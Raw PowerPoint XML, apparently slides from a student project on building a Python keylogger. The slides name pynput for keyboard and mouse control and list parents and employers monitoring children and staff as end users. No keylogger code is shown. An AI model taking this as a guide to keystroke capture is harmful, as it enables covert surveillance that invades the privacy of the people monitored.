              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5974763"/>
            <a:ext cx="55116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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2924174" y="4452192"/>
            <a:ext cx="3552826" cy="1567608"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11106472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14" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="609600" y="712571"/>
            <a:ext cx="10018713"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642870" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>PROJECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1447800" y="1892100"/>
            <a:ext cx="6791325" cy="3960282"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>First we install the python ide and then we install the two packages.</a:t>
            </a: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342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>First one is pip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> install.</a:t>
            </a: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342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Next one is johns library.</a:t>
            </a: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342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Then these two are used for controlling mouse and keyboard.</a:t>
            </a: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342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>So we can use for keylogger security.</a:t>
            </a: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342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Above like that you can install it in command prompt.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>By these two libraries we cannot get error in python code.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5974763"/>
            <a:ext cx="55116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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4953000" y="2637979"/>
            <a:ext cx="1699407" cy="213377"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4843462" y="3072846"/>
            <a:ext cx="2482067" cy="172115"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77757720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flipH="1" rot="0">
            <a:off x="2523982" y="1005241"/>
            <a:ext cx="3048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2" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="672082" y="793340"/>
            <a:ext cx="10681335"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000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-235" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-45" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1219200" y="2195797"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Parents might use a keylogger to monitor a child's screen time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> Companies often use keylogger software as part of employee monitoring software to help track employee productivity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
